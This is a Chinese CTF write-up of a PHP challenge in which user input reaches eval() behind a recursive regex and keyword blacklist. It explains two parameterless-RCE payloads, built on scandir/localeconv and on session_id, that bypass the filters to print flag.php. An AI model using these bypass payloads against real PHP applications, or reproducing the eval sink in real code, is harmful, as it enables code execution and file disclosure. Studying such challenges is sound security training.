本文最后更新于42 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
考点:无参数RCE
前期工作:
啥代码木有,大概率是要dirsearch或者扫描.git泄露,扫描后找到index.php
代码如下
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
//过滤伪协议(如 data://, php:// 等)
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
//检查输入是否匹配特定模式(递归正则)
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
//过滤敏感关键词(如 et, na, info 等)
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);//若所有检查通过,则执行用户输入的代码
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>思路:这里有一个递归正则,可以套娃以多个[a-z,_]字符加上() 组成的表达式,也就是一个无参数RCE,思路是执行show_source(flag.php)或者highlight_file(flag.php),那么重点就是获得一个flag.php
方法一:scandir()
scandir()是 PHP 自带的函数,用来列出指定目录下的所有文件和子目录,并以数组的形式返回结果。可以scandir(‘.’)来获取当前目录下的文件名,而 ‘.‘ 可以通过pos(localeconv())来获得localeconv()的第一个字符’.’ (current(localeconv())也可以),
接着对数组操作获取flag.php,这里使用next(array_reverse())即把数组翻过来后的第二个
?exp=show_source(next(array_reverse(scandir(current(localeconv())))));
方法二:SESSIONID
这个方法可以获得任意的参数,值得注意
?exp=show_source(session_id(session_start()));
